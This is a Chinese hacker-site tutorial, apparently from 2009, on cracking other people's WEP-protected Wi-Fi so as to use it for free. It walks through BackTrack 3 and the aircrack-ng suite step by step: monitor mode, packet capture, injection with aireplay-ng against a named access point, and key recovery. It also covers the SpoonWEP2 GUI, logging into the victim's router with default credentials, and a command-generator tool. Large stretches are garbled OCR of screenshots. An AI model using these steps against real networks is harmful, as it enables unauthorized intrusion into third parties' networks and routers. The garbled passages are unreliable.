入侵无线网络

入侵无线网络（图）www.hx99.org阅读：繇868时间：2009-07-30整理：华西黑盟自从买了笔记本之后，无线网卡经常会收到一些无线网络，信号很强，但是都连不上去，要密码。难道只 能看着流口水？那当然不会，要的就是免费上网！现在无线的加密方式主要有两种：WEP和WPA。目前来说，WPA的破解方式目前还仅限于穷举法， 如果猜解字典里没有密码，那就束手无策。而WEP，只要数据包足够，就有机会破解出来WEP是一种在接入点和客户端之间以“RC4”方式对分组信息进行加密的技术，密码很容易被破解。 WEP使用的加密密钥包括收发双方预先确定的40位（或者104位）通用密钥，和发送方为每个分组信息所确 定的24位、被称为IV密钥的加密密钥。但是，为了将IV密钥告诉给通信对象，IV密钥不经加密就直接 嵌入到分组信息中被发送出去。如果通过无线窃听，收集到包含特定IV密钥的分组信息并对其进行解析， 那么就连秘密的通用密钥都可能被计算出来。WPA是继承了 WEP基本原理而又解决了 WEP缺点的一种新技术。由于加强了生成加密密钥的算法， 因此即便收集到分组信息并对其进行解析，也几乎无法计算出通用密钥。小菜们只要熟悉WEP的破解就可 以了，破解工具使用Backtrack 3。BackTrack是基于SLAX的自启动运行光盘，被设计为用于live usb 或 live cd 的 linux 发行版。BackTrack 依靠融合 Auditor Security Linux 和 WHAX（先前的 Whoppix）而 创建成的。它集成了众多安全和审计软件。使用Backtrack 3有4种方法：硬盘、U盘、光盘、虚拟机。 从光盘启动不保存修改的数据；VM启动只识别USB或PCMCIA的无线网卡（VM不能识别PCI总线网卡， 笔记本电脑内置网卡一般为miniPCI总线，所以内置网卡一般不支持VM）；硬盘速度比较快，但是U盘很 方便。大家可以根据自己的需要选择，这里介绍一下硬盘和U盘的安装方法。下载好BT3 Final版之后，解压到D盘根目录（注意，如果“BT3”文件夹为英文小写“bt3”，请将其改完大写“BT3”，否 则不能正常启动。Linux区分大小写）；然后把硬盘启动引导的3个文件复制到C盘根目录下，运行 xp_vista_grub4dos即可。制作U盘版先要准备一个1G以上的U盘，建议将U盘格式化成FAT32,这样比较 节省空间，下载bt3final_usb.iso文件后直接解压到U盘中，解压后会出现boot和BT3两个文件夹，进入boot文件夹双击bootinst.bat执行批处理，然后按两下任意键即可制作完成。要从U盘启动先进入BIOS选择启动方式为USB。一、破解无线密码由于BT3不支持某些网卡，而且笔记本内置的网卡的功率远不如USB网卡，所以想要蹭人家网或者对这方面深入研究，先得买一块高功率的无线USB 网卡，如图1。安全中国VIP会员培训viP现在流行的有卡皇、卡王、魔翼、威海王等品牌。用USB延长线将无线网卡放到窗户外面，可以 获得更多更好的信号，这是最便宜的增加信号，并且效果最明显的办法！当然，你也可以再购置一个天 线。破解计算机：惠普Pavilion dv4 1103TX网卡：魔翼精品盒装版200mw 8187L芯片5dbi的天线启动电脑选择Bcktrack系统，稍等一下就能自动登陆到BT3系统的界面了。如果需要登录，账号密码为root和toor，然后输入startx即 可，如图2。BackTrack破解WEP的方法有非常多，介绍两种：一种是用命令来进行破解，相当于Winows下的DOS命令；二是自动化WEP破解软件，只需点几下鼠标。推荐用第一种破解方式，有助于理解破解WEP的 原理以及提高动手能力。先说介绍纯命令的方法：点击下面第二个按钮打开一个shell，输入命令ifconfig -a列出电脑 中的网卡，如果没有，那说明不支持，我的USB网卡为wlan0，如图3。ShellW systemmedla/sdaE/ - Konque " Shell - KHome55tembt - ifconfig -aetho Link encap: Ethernet Hiaddr 00:25 BKOADCAST MULTICAST MTU： 1500 Me RX packets: 0 errors: 0 dropped : 146： TK packets.; 0 errors: 0 dropped: 0 o caUisions: 0 txqueuelen :RX by+es:0 (Q.O b) TX bytes:0 (0 Interrupt! 19 Ba非 address: 9>ts0OGLink encap:Local Loopback inet addr:L27.O.0.1 Mask:255.0.0 UP LOOPBACK RUNNING MTU： 16436 Hi RX packets: 0 errors: 0 dropped:0 ' TX packets; 0 errors; 0 dropped : 0 o1 callisions: fl txqueuelen-; 0RX bytes;0 (0,0 b) TX bytes(0|wlan0 Link encap: Ethernet Hiadcir 00 :E0 BROADCAST MULTICAST MTU： 1500 Me RX packets:0 errors:3 dropped:0 ' TK packets:0 errors:0 dropped:0 口 collisions: 0 txqueuelen : lOCiQ RX bytes:0 (0.0 b) TX bytes:0 (0然后输入airmon-ng start wlan0来激活监听模式，“monitor mode enabled”表示监听模式已经开启， 如图4。I：it r ： airmon-ng start wlanOInterfaceChipsetDriverwlanQR.7LS1B7BN7incle 己rubied安全市国VIP会员培训 ViPbt -|输入命令airodump-ng wlan0来查看无线网络，如图5。解释一下几个名称：BSSID:扫描到的无线路由的MAC地址，这个地址破解的时候需要用到。PWR:无线路由的信号强度。Beacons:向此路由发送的数据包的数量。#Data:网卡抓到的数据包的数量。CH:无线路由所在的信道。ENC与CIPHER,这个是无线路由的加密方式。-ESSID:无线路由的SSID的名称。现在要破解的必须为ENC和CIPHER都为wep，选定netgaer为破解对象。再打开一个shell输入 airodump-ng 一ivs -w xxx -c 11 wlan0，截取 11 信道的 ivs 数据包，并保存名为 xxx.ivs，如图 6。但是#Data增长缓慢，为了加快数据包的获取速度，可以使用注入攻击。输入命令aireplay-ng -2 -p 0841 -c ffffffffffff -b 00184d9b08f8 -h 00e04c0350df wlan0，解释一下命令：-2 表示交互模式 -2，发包注入攻击，-b 00184d9b08f8就是-b之后加上你需要破解的AP的Mac地址，-h 00e04c0350df就 是-h之后，加上你的无线网卡的Mac地址，如图7。Q 局1Shell - Konsole <3>aireplay-ng -2 -p 0841 -c ffffffffffff -b OO184d9b08fS -h OOE04C035ODF wlanQ Read 45 packets.Size: 68, FromDS: 0, ToDS: 1 (WEP)BSSIDDest. T-1ACSource MAC00：1S：4D：9B：O8： F8FF：FF：FF：FF：FF：FF00:1A:73:E2:DD:CD0X0000 :0841300000184d9b08f8001a73e2ddcd0x0010:ffffffffffff6006ca0200008b81c4eb0x0020:2e7cb3ddcba35Je8725aeeldbacc229c0x0030:ef5c71776d65f2dd58a5c6468b03c41f0x0040:9218lf61Use this packet ? ySaving chosen packet in replay_src-0517- 1J3632.cap You should also start airodump-ng to capture replies.安全中国VIP会员培训VlP,anqn.conent 15864 packets.(499 叩s)执行后，你会看到第一个窗口里面，要破解的那个AP后面的#Data在飞速增长。当#Data达到20000的时候，就可以测试破解了。在新窗口中运行：aircrack-ng -n 64 -b 00184d9b08f8 xxx-01.ivs破解。解释一下命令：-b 00184d9b08f8就是-b后加对方AP的Mac地址，xxx-01.ivs就是执行airodump-ng 一ivs-w xxx -c 11 wlan0生成的一个文件。-n 64是指破解64位的密码，如果10万以上Data都破解不出来， 那就试试-n 128，估计用了 128位加密。如果运气好，一会儿就会显示破解出来的密码，同时会显示对应 的Assic码，如图8。Shell - KonsoleAircrack-ng 1.0 rcl rl08500:00:02 Tested 1496447 keys (got 11781 IVs)KB 0 1 2 3 4depth 0/ 2 2/ 19 36/ 2 21/ 60 33 / 44bytet vote)58(19712) D9(17664)80(16640) 74(15872)F4( 13824) 0E(13568)63(14336) 7A(14336)FC (13568) 13(. 13312)63(16128) 7A(15616) 2A(13568) 81(14336)14( 13312)81( 16128)34( 15104)32( 13568)84(14336)2B( 13312)0F(15872) 78(15104) 35(13568) 99(143J6) 46( 13312)E2(15872)C6t15104)3A(13568)4F(14080)5A( 13312)17(15616)CE(15104)42(13568)9C(14080)7E(13312)KEY FOUND! 58:80:77:63:00 (ASCII： X.wc.)bt. - # |Decrypted correctly: 100%安全中国VIP会员培训如果不是标准Assic码，就是一串数字，那就是密码。下面介绍一下图形化的操作，用到的破解工具版本为SpoonWEP2）。BT3没有集成Spoonwep2，下载之后把Spoonwep2.lzm放在BT3/modules目录里，进入系入spoonwep即可。在NET CARD里选择使用的网卡，我的为wlan0，DRIVER项下供选择驱动，一般选NORMAL-般是选 UNKNOWN VICTIM，如图 9。SpoanWep 2 / Wep Finiler J Sh-cimanVirtuel 2K9.SFOONWEF SETTINGS.NET CAI.' |DRIVERNORMAL妙 MODEUNKNOtth VICTIMNEXT I安全中国vip会员培训H J化muqnqctE以上3项选好后点NEXT键进入下一步。接着转到另一个窗口，左上角有2个可选项，FIXED CHAN是搜索指 搜索某频道，就选这一项，然后把频道指针指向你想搜的频道刻度；CHAN HOPPING则是全频道搜索。我选CH 右上角的LAUNCH，开始按你的选择搜索无线加密信号。过一会儿，被搜索到的无线信号的SSID将会以列表显 线信号的CLIS方框内有“勾”，表示该无线信号有客户端，这时破解会的效率会高一些，如图10。选择一个准备破解的无线信号，然后点下方的SELECTION OK键正式破解环节。Launch有4个选项：ARP REPLAY ATTACK（有客户端时用，对应-3 攻击）P0841 REPLAY ATTACK对应-2 攻击）CHOPCHOP & FORGEATTACK（次选，对应-4 攻击）FRAGMENTATION & F对应-5攻击）Deauth中个选项，其中：? LENGTH（不指定加密位数，首选）128 BITS LENGTH （指定128位加密，次次选）64 BITS LENGTH （指定64位加密，次选）大家可以根据情况进行选择。InjRate保持默认，欲破解的MAC和信道已经自动为你填好了，点击点 自动开始破解了，如图11。这时会弹出一个窗口，显示破解的各个参数，如图12。如果你的RP够好，等一会儿，对方加密的无线路由器的密码就会在WEP Key之后以红字显示出来，冒号省略掉，就是该加密无线信号的密码，把它记下，如图13。重启电脑进入Windows系统，用无线网卡去连接该加密无线路由器，在提示需要输入密码时，输入上述密 成。如果显示“连接受限制或无连接”，则有可能是目标AP未激活DHCP服务，或DHCP设置为只为指定的主 时可以自己设定一个IP。连接上去之后，输入192.168.1. 1使用默认的用户名和密码成功登陆了路由器，看 发现除了我还有3台在线。怎么发挥就看各位的了，呵呵。最后介绍一款自动生成命令的软件：BackTrack3s WEP破解指令生成机。只需填入频段、目标SSID 本机MAC地址、IVS文件名，点成名命令即可即可生成需要破解的各个命令，点击修改模板也可以按你的需求G BackTrack3's WEP破程有令生成机1.0 甘C-jpjTi ght Jeffi-ey Eh：辽逼QQ ； 4567013 MSN； j 日EEr eyS；aireplajng T 0 _e NETGEAR r 001B4d9b06f8 _h频段£11目标SSID :-ffiTGEAK目标MAC地址的 CO104d9 BOSES本初IAC 地址* UOE04C0350DF工器文件名，|黑城修改程板| 生成色£官if config： aifconfig： 一at athO upairmcirL_rLg 5t：irt wifiO 11airodiJinp-rLg -一ivs _w kkx _c 11 ithl ai r o dijirip-ng :ithl郑重声明：，请遂守互联网管理条例及 中华X民共和国其他杳顼有关怯律本程序恒限用于学习和底流？用户需对自己在使用本程序中 的行的威担法律责任（直接或间播 导秋的）.寸程序可随意括载-2 Crack Filo lieaireplajng -2 -p 0841 c ffffffffffff b 00164.191.08:-3 Cr：±ek Mo inaireplajng -3 -b 0018419b08f8 -h DOE04C0350DT at上 14 Crack Moleai re plains 7 -b 0018419L08£8 -h DOE04C035aDT athlpacke+£orge_ng _0 _a. 00184d9bO8£B _h OOE04CO35ODF _k ai r e pl aj1-ng -2 r HyArp _x 256 ithl-5 Crack Moleaireplaj-rLg -5 -b 00184.19LUS£8 -h UUELl4CLl35ailF Shi p:icke11urge_ng _0 -：± 001 S-4d'dLOSf8 Tl OijEiJ-4CO3EOriF k ai r e plnp; -2 r MrAi_p _x 256 ithlCrck Keyaircr=ick-ng tl 64 t 00184dyt08t8 kxx-01 . ivs把它保存为TXT文件到BT3里直接复制即可，方便省事，也不容易出错。有些小菜喜欢在中文的环境下的4个文件放在BT3/modules目录里即可完成汉化，如图15。E3 W取：ZZ x眨-皿心吁i昌研会虽割I ViP.tinqn.CQm现在我们终于能够蹭对方的网了，不过忠告各位，要文明蹭网，不要使用迅雷下载大型文件或者其他